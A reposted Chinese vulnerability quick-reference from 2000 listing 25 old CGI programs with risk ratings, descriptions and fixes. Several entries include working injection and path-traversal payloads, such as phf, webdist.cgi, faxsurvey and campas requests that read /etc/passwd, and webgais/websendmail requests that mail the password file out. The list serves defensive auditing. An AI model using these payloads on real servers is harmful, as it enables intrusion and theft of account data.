php教程 php手册 CGI安全漏洞资料速查 v1.0(转一)

CGI安全漏洞资料速查 v1.0(转一)

Jun 21, 2016 am 09:12 AM
bin cgi quot

cgi|安全|安全漏洞

◆ CGI安全漏洞资料速查 v1.0

日期:2000-8-15

    #############################################################################
本文取自一位朋友.这本来不算是什么珍贵的东西,如果你平时注意收集的话,相信很多人都会
有比这份更全面、更好的资料.但由于某些原因.这些资料一直都不肯被公开.但我是一个崇尚完
全自由、完全开放、完全共享的little guys.所以我把这份资料公开了.希望那位朋友不要怪罪 :) 
# 如有任何安全组织或个人愿意无尝对此文进行长期的、不间断地维护、更新或更改. 请自行
  随便,不必与我商讨.但要求是成果必须完全地向internet公开. 任何行为的私藏都是不受欢
  迎的.
# 本文欢迎转摘.但请保持这些声明。
# 如有任何问题或建议,请mailto: iwillsurewin@163.net
# iwillsurewin 2000.7.28
############################################################################

         
1
类型: 攻击型
名字: phf
风险等级: 中
描述: 在NCSA 或者 Apache (1.1.1版本以内)非商业版本的Web Server中有一段程序util.c,允许黑客以root身份执行任何一个指令:
http://www.xxx.com/cgi-bin/phf?Qname=root%0Asome%20command%20here
建议: 
解决方法: 把Apache web server升级到1.1.1以上,或者将NCSA web server升级到最新版本

_________________________________________________________________

2
类型: 攻击型
名字: wguset.exe
风险等级: 中
描述: 如果您使用NT做为您的WebServer的操作系统,而且wguest.exe存在于您的Web可执行目录中的话,入侵者将能利用它阅读到您的硬盘上所有USR_用户能阅读的文件
建议: 将wguset.exe从你的Web目录移走或删除
解决方法: 将wguset.exe从你的Web目录移走或删除

___________________________________________________________________


3
类型: 攻击型
名字: rguset.exe
风险等级: 中
描述: 如果您使用NT做为您的WebServer的操作系统,而且rguest.exe存在于您的Web可执行目录中的话,入侵者将能利用它阅读到您的硬盘上所有USR_用户能阅读的文件
建议: 将rguset.exe从你的Web目录移走或删除
解决方法: 将rguset.exe从你的Web目录移走或删除


_______________________________________________________________________

4
类型: 攻击型
名字: perl.exe
风险等级: 低
描述: 在cgi-bin执行目录下存在perl.exe,这属于严重的配置错误。黑客可以在perl.exe后面加一串指令,利用浏览器在server上执行任何脚本程序
建议: perl.exe是放在任何带执行权限的web目录下都是不安全的
解决方法: 在web目录下移除perl.exe这个程序.


____________________________________________________________________


5
类型: 攻击型
名字: shtml.exe
风险等级: 低
描述: 如果您使用Front Page作为您的WebServer,那么入侵者能够利用IUSR_用户和shtml.exe入侵您的机器,做您不希望的事
建议: 将shtml.exe从你的Web目录移走或删除
解决方法: 将shtml.exe从你的Web目录移走或删除


___________________________________________________________________


6
类型: 攻击型
名字: wwwboard.pl
风险等级: 低
描述: wwwboard.pl程序容易引起攻击者对服务器进行D.O.S攻击
建议: 如无必要可以删除该文件
解决方法: 对get_variables的子程序中的下面这段:
if ($FORM{'followup'}) { $followup = "1";
@followup_num = split(/,/,$FORM{'followup'});
$num_followups = @followups = @followup_num;
$last_message = pop(@followups);
$origdate = "$FORM{'origdate'}";
$origname = "$FORM{'origname'}";
$origsubject = "$FORM{'origsubject'}"; }
替换为:
if ($FORM{'followup'}) {
$followup = "1";
@followup_num = split(/,/,$FORM{'followup'});
$num_followups = @followups = @followup_num;
$last_message = pop(@followups);
$origdate = "$FORM{'origdate'}";
$origname = "$FORM{'origname'}";
$origsubject = "$FORM{'origsubject'}";
# WWWBoard Bomb Patch
# Written By: Samuel Sparling sparling@slip.net)
$fn=0;
while($fn {
$cur_fup = @followups $fn];
$dfn=0;
foreach $fm(@followups)
{
if(@followups[$dfn] == @followups[$fn] && $dfn != $fn)
{
&error(board_bomb);
}
$dfn++;
}
$fn++;
}
# End WWWBoard Bomb Patch
}

相关连接: http://hgfr

_________________________________________________________________________

7
类型: 攻击型
名字: uploader.exe
风险等级: 中
描述: 如果您使用NT作为您的WebServer的操作系统,入侵者能够利用uploader.exe上传任何文件
建议: 将uploader.exe从你的Web目录移走或删除
解决方法: 将uploader.exe从你的Web目录移走或删除

________________________________________________________________

8
类型: 攻击型
名字: bdir.htr
风险等级: 高
描述: 如果您使用NT做为您的WebServer的操作系统,而且bdir.htr存在于您的Web可执行目录中的话,入侵者将能利用它在您的服务器上无止境的创建ODBC数据库,并生成一些可执行的文件。
建议: 将bdir.htr从你的Web目录移走或删除
解决方法: 将bdir.htr从你的Web目录移走或删除

__________________________________________________________________

9
类型: 攻击型
名字: Count.cgi
风险等级: 高
描述: 在/cgi-bin目录下的Count.cgi程序(wwwcount2.3版本)有一个溢出错误,允许入侵者无须登录而远程执行任何指令.
建议: 如无必要可以删除该文件
解决方法: 将wwwcount升级到2.4或者以上

_________________________________________________________________

10
类型: 攻击型
名字: test-cgi
风险等级: 高
描述: test-cgi这个文件可以被入侵者用来浏览服务器上的重要信息

建议: 建议审核cgi-bin目录下的执行程序,严格控制访问权限
解决方法: 删除test-cgi文件

__________________________________________________________________

11
类型: 攻击型
名字: nph-test-cgi
风险等级: 高
描述: nph-test-cgi这个文件可以被入侵者用来浏览服务器上的重要信息

建议: 建议审核cgi-bin目录下的执行程序,严格控制访问权限
解决方法: 删除nph-test-cgi文件

__________________________________________________________________

12
类型: 攻击型
名字: php.cgi
风险等级: 低
描述: php.cgi程序有较多的漏洞,包括缓存溢出漏洞,还有导致任何系统文件可以被入侵者读取的漏洞
建议: 建议审核cgi-bin目录,避免有不必要的程序存在
解决方法: 删除php.cgi程序是最好的办法

_________________________________________________________________

13
类型: 攻击型
名字: handler
风险等级: 低
描述: IRIX 5.3, 6.2, 6.3, 6.4的/cgi-bin/handler程序存在缓存溢出错误,允许入侵者在server上远程执行一段程序:
telnet target.machine.com 80
GET /cgi-bin/handler/whatever;cat /etc/passwd| ?data=Download
HTTP/1.0
建议: 建议审核cgi-bin目录,避免有不必要的程序存在
解决方法: 删除handler文件

________________________________________________________________


14
类型: 攻击型
名字: webgais
风险等级: 高
描述: /cgi-bin,目录下的webgais是GAIS搜索工具的一个接口,它有一个毛病使入侵者可以绕过程序的安全机制,执行系统命令:
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit" line)
telnet target.machine.com 80

query=';mail+you\@your.host/passwd;echo'&output=subject&domain=paragraph
建议: 建议审核cgi-bin目录,避免有不必要的程序存在
解决方法: 删除webgais文件

________________________________________________________________

15
类型: 攻击型
名字: websendmail
风险等级: 高
描述: /cgin-bin目录下的websendmail程序允许入侵者执行一个系统指令:

telnet target.machine.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the string passed to the server, in this case xxx=90)
receiver=;mail+your_address\@somewhere.org/passwd;&sender=a&rtnaddr=a&subject=a
&content=a
建议: 建议审核cgi-bin目录,避免有不必要的程序存在
解决方法: 高级用户:编辑websendmail脚本,过滤特殊字符
一般用户:删除websendmail文件

____________________________________________________________________

16
类型: 攻击型
名字: webdist.cgi
风险等级: 高
描述: 对于Irix6.2和6.3平台,/cgi-bin目录下的webdist.cgi有一个弱点允许入侵者无须登录而在系统上执行任何指令:
http://host/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd

建议: 建议审核cgi-bin目录,避免有不必要的程序存在
解决方法: 删除/var/www/cgi-bin/webdist.cgi目录下的webdist.cgi

__________________________________________________________________

17
类型: 攻击型
名字: faxsurvey
风险等级: 高
描述: 在Linux S.u.S.E上/cgi-bin目录下的faxsurvey程序允许入侵者无须登录就能在服务器执行指令:
http://joepc.linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
建议: 建议审核cgi-bin目录,避免有不必要的程序存在
解决方法: 删除/cgi-bin/faxsurvey文件


_______________________________________________________________________


18
类型: 攻击型
名字: htmlscript
风险等级: 中
描述: 安装了htmlscript2.99x或者更早版本的服务器,存在一个毛病使入侵者可以查看服务器上的任何文件:
http://www.vulnerable.server.com/cgi-bin/htmlscript?../../../../etc/passwd
建议: 建议审核cgi-bin目录,避免有不必要的程序存在
解决方法: 删除/cgi-bin/htmlscript脚本文件,或者将htmlscript升级到3。0以上


__________________________________________________________________________

19
类型: 攻击型
名字: pfdisplay
风险等级: 中
描述: 在Irix6.4或者更早版本的web服务器上,/cgi-bin/pfdisplay程序允许入侵者非法查看服务器上的文件
建议: 建议审核cgi-bin目录,避免有不必要的程序存在
解决方法: 删除/cgi-bin/pfdisplay文件,或者打补丁
补丁可以去sgigate.sgi.com (204.94.209.1) 或者ftp.sgi.com下载:
Filename: README.patch.3018
Algorithm #1 (sum -r): 37955 11 README.patch.3018
Algorithm #2 (sum): 15455 11 README.patch.3018
MD5 checksum: 1169EB51D75E0794C64C2C1FD6211B69

Filename: patchSG0003018
Algorithm #1 (sum -r): 01679 2 patchSG0003018
Algorithm #2 (sum): 12876 2 patchSG0003018
MD5 checksum: BD16A53A0AE693D6E9E276EE066BDBC8

Filename: patchSG0003018.idb
Algorithm #1 (sum -r): 01339 2 patchSG0003018.idb
Algorithm #2 (sum): 251 2 patchSG0003018.idb
MD5 checksum: 1CB16E6A8C50BF17CD02A29C2E4D35EB

Filename: patchSG0003018.performer_tools_man
Algorithm #1 (sum -r): 10201 8 patchSG0003018.performer_tools_man
Algorithm #2 (sum): 3144 8 patchSG0003018.performer_tools_man
MD5 checksum: B6B3D90FAB9B5A342397C3E5AF5A8D29

Filename: patchSG0003018.performer_tools_sw
Algorithm #1 (sum -r): 48474 18 patchSG0003018.performer_tools_sw
Algorithm #2 (sum): 28176 18 patchSG0003018.performer_tools_sw
MD5 checksum: DF4E8ED8326A6A0B39F7B4D67E5FD71F
相关连接: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


_____________________________________________________________________


20
类型: 攻击型
名字: www-sql
风险等级: 中
描述: www-sql存在于/cgi-bin/目录下,这将导致入侵可以越权访问被保护的文件
建议: 最好删除www-sql文件
解决方法: #if PHPFASTCGI
while(FCGI_Accept() >= 0)
{
#endif
s = getenv("REDIRECT_STATUS");
if(!s) {
puts("Content-type: text/plain\r\n\r\nPHP/FI detected an internal error. Please inform sa@hogia.net of what you just did.\n");
exit(1);
}
s = getenv("PATH_TRANSLATED");
相关连接:

_________________________________________________________________________________


21
类型: 攻击型
名字: view-source
风险等级: 高
描述: 在cgi-bin目录下的view-source程序没有对输入进行安全检查,使入侵者可以查看服务器上的任何文件
建议: 建议审核cgi-bin目录,避免有不必要的程序存在
解决方法: 删除/cgi-bin目录下的viewsource程序
相关连接: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64

______________________________________________________________________

22
类型: 攻击型
名字: campas
风险等级: 高
描述: 在cgi-bin目录下的campas程序有一个毛病可以使入侵者随意查看server上的重要文件:
telnet www.xxxx.net 80
Trying 200.xx.xx.xx...
Connected to venus.xxxx.net
Escape character is '^]'.
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
建议: 建议审核cgi-bin目录,避免有不必要的程序存在
解决方法: 删除/cgi-bin目录下的campas程序
相关连接: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


___________________________________________________________________________


23
类型: 攻击型
名字: aglimpse
风险等级: 高
描述: 在cgi-bin目录下的aglimpse程序有一个毛病可以使入侵者无须登录而随意执行任何指令 
建议: 建议审核cgi-bin目录,避免有不必要的程序存在
解决方法: 删除/cgi-bin目录下的aglimpse程序
相关连接: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


______________________________________________________________________________

24
类型: 攻击型
名字: AT-admin.cgi
风险等级: 中
描述: 在Excite for Web Servers 1.1上的/cgi-bin/AT-admin.cgi程序,允许普通用户完全控制整个系统
建议: 建议审核cgi-bin目录,避免有不必要的程序存在
解决方法: 删除/cgi-bin目录下的AT-admin.cgi程序
相关连接: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


____________________________________________________________________________________

25
类型: 攻击型
名字: finger
风险等级: 中
描述: 这个位于/cgi-bin下的finger程序,可以查看其它服务器的信息,但是如果将参数改成本机,本机上的帐号信息将暴露无遗:
/cgi-bin/finger?@localhost
建议: 建议审核cgi-bin目录,避免有不必要的程序存在
解决方法: 删除/cgi-bin目录下的finger程序
相关连接:


________________________________________________________________________



본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.

핫 AI 도구

Undresser.AI Undress

Undresser.AI Undress

사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover

AI Clothes Remover

사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool

Undress AI Tool

무료로 이미지를 벗다

Clothoff.io

Clothoff.io

AI 옷 제거제

AI Hentai Generator

AI Hentai Generator

AI Hentai를 무료로 생성하십시오.

인기 기사

R.E.P.O. 에너지 결정과 그들이하는 일 (노란색 크리스탈)
3 몇 주 전 By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. 최고의 그래픽 설정
3 몇 주 전 By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. 아무도들을 수없는 경우 오디오를 수정하는 방법
3 몇 주 전 By 尊渡假赌尊渡假赌尊渡假赌
WWE 2K25 : Myrise에서 모든 것을 잠금 해제하는 방법
3 몇 주 전 By 尊渡假赌尊渡假赌尊渡假赌

뜨거운 도구

메모장++7.3.1

메모장++7.3.1

사용하기 쉬운 무료 코드 편집기

SublimeText3 중국어 버전

SublimeText3 중국어 버전

중국어 버전, 사용하기 매우 쉽습니다.

스튜디오 13.0.1 보내기

스튜디오 13.0.1 보내기

강력한 PHP 통합 개발 환경

드림위버 CS6

드림위버 CS6

시각적 웹 개발 도구

SublimeText3 Mac 버전

SublimeText3 Mac 버전

신 수준의 코드 편집 소프트웨어(SublimeText3)

bin은 어떤 파일인가요? bin은 어떤 파일인가요? Jan 23, 2024 pm 03:33 PM

bin 파일은 컴퓨터 파일 형식으로 "binary file"의 약어입니다. bin 파일은 일반적으로 컴퓨터 프로그램이나 데이터를 저장하고 전송하는 데 사용됩니다. 소프트웨어 개발에서 컴파일러는 소스 코드를 바이너리 형식으로 변환하고 실행 가능한 bin 파일을 생성합니다. 이러한 bin 파일에는 컴퓨터 프로그램의 기계어 코드가 포함되어 있으며 컴퓨터에서 직접 실행할 수 있습니다. 바이너리 파일에는 낮은 수준의 기계 명령어가 포함되어 있으므로 일반적으로 텍스트 파일보다 더 효율적이고 빠릅니다.

수정: DC 워터마크 없음 NVIDIA/Games - Adobe 화면 왼쪽 상단에 DC 없음 수정: DC 워터마크 없음 NVIDIA/Games - Adobe 화면 왼쪽 상단에 DC 없음 Apr 30, 2023 am 08:22 AM

일부 NVIDIA Studio 드라이버 사용자는 최근 Adobe Premiere Pro 애플리케이션에서 "NODC" 워터마크가 표시되는 문제를 보고했습니다. 일부 사용자는 "YESDC" 워터마크도 보인다고 보고했습니다. 하지만 걱정하지 마세요. 이는 모두 NVIDIA 코어 파일의 손상된 bin 파일 때문입니다. 따라서 파일 탐색기에서 파일을 찾아 손상된 파일을 삭제하고 다시 시작하면 문제가 해결됩니다. 또는 기본 NVIDIA3d 설정을 복원할 수도 있습니다. 문제를 신속하게 해결하려면 다음 수정 사항을 따르십시오. 수정 1 - NVIDIAbin 파일 제거 아래 단계에 따라 시스템에서 제거하십시오.

bin의 파일 형식은 무엇입니까? bin의 파일 형식은 무엇입니까? Feb 01, 2023 pm 02:26 PM

bin은 바이너리 파일 형식이며, 그 용도는 시스템이나 응용 프로그램에 따라 다릅니다. 파일 형식은 바이너리이며 접미사가 ".bin"인 파일은 예를 들어 가상 광학 형식임을 나타냅니다. 드라이브 파일은 일반적으로 접미사로 ".bin"을 사용하지만 이는 모든 bin 파일이 가상 CD-ROM 파일이라는 의미는 아닙니다. 일반적으로 말하면 이는 기계어 코드 및 어셈블리 언어 컴파일 결과입니다.

mdk로 bin 파일을 생성하는 방법 mdk로 bin 파일을 생성하는 방법 Oct 10, 2023 am 09:56 AM

MDK를 사용하여 bin 파일을 생성하는 방법에는 프로젝트 생성, 애플리케이션 코드 작성, 출력 경로 및 이름 설정, 컴파일 및 링크와 같은 단계가 포함됩니다. 자세한 소개: 1. MDK 소프트웨어를 열고 새 프로젝트를 만듭니다. "프로젝트" 메뉴에서 "새 프로젝트"를 선택한 후 대상 장치의 모델과 공급업체를 선택합니다. 2. 팝업 대화 상자에서 프로젝트의 저장 경로와 이름을 선택하고 "저장"을 클릭합니다. 버튼 등

PHP와 CGI를 사용하여 사용자 등록 및 로그인 기능을 구현하는 방법 PHP와 CGI를 사용하여 사용자 등록 및 로그인 기능을 구현하는 방법 Jul 21, 2023 pm 02:31 PM

PHP와 CGI를 사용하여 사용자 등록 및 로그인 기능을 구현하는 방법 사용자 등록 및 로그인은 많은 웹사이트에 필요한 기능 중 하나입니다. 이 기사에서는 PHP와 CGI를 사용하여 이 두 가지 기능을 구현하는 방법을 소개합니다. 코드 예제를 통해 전체 프로세스를 보여드리겠습니다. 1. 사용자 등록 기능 구현 사용자 등록 기능을 통해 신규 사용자는 계정을 생성하고 해당 정보를 데이터베이스에 저장할 수 있습니다. 다음은 사용자 등록 기능을 구현하기 위한 코드 예제입니다. 데이터베이스 테이블 생성 먼저, 사용자 정보를 저장할 데이터베이스 테이블을 생성해야 합니다. 할 수 있다

PHP 및 CGI 파일 업로드 및 다운로드 기술: 파일 관리 기능 구현 방법 PHP 및 CGI 파일 업로드 및 다운로드 기술: 파일 관리 기능 구현 방법 Jul 21, 2023 am 11:19 AM

PHP 및 CGI를 사용한 파일 업로드 및 다운로드 기술: 파일 관리 기능 구현 방법 소개: 파일 업로드 및 다운로드는 최신 웹 애플리케이션의 일반적인 기능 중 하나입니다. 이 기사에서는 PHP 및 CGI 프로그래밍 언어를 사용하여 파일 업로드 및 다운로드 기능을 구현하는 방법을 소개하고 업로드 및 다운로드된 파일을 관리하는 방법을 보여주는 몇 가지 코드 예제를 보여줍니다. 우리가 다룰 내용은 다음과 같습니다: PHP를 사용한 파일 업로드의 기본 개념 파일 업로드 CGI 파일 업로드 PHP를 사용한 파일 다운로드의 기본 개념 파일 다운로드 CGI 파일 다운로드

php提交表单通过后,弹出的对话框怎样在当前页弹出,该如何解决 php提交表单通过后,弹出的对话框怎样在当前页弹出,该如何解决 Jun 13, 2016 am 10:23 AM

php提交表单通过后,弹出的对话框怎样在当前页弹出php提交表单通过后,弹出的对话框怎样在当前页弹出而不是在空白页弹出?想实现这样的效果:而不是空白页弹出:------解决方案--------------------如果你的验证用PHP在后端,那么就用Ajax;仅供参考:HTML code

PHP와 CGI를 사용하여 웹사이트의 비디오 재생 기능을 구현하는 방법 PHP와 CGI를 사용하여 웹사이트의 비디오 재생 기능을 구현하는 방법 Jul 22, 2023 pm 07:45 PM

PHP와 CGI를 사용하여 웹사이트의 비디오 재생 기능을 구현하는 방법 오늘날 멀티미디어 시대에 비디오는 웹사이트 콘텐츠에서 없어서는 안 될 부분이 되었습니다. 좋은 사용자 경험을 제공하기 위해 웹사이트는 비디오 재생 기능을 구현해야 합니다. 이 기사에서는 PHP와 CGI를 사용하여 웹사이트의 비디오 재생 기능을 구현하는 방법을 소개하고 참조용 코드 샘플을 제공합니다. 1. 준비 시작하기 전에 서버에 PHP 및 CGI 모듈이 설치되어 있는지 확인해야 합니다. phpinfo() 함수를 실행하거나 "php"를 입력하여 이를 수행할 수 있습니다.

See all articles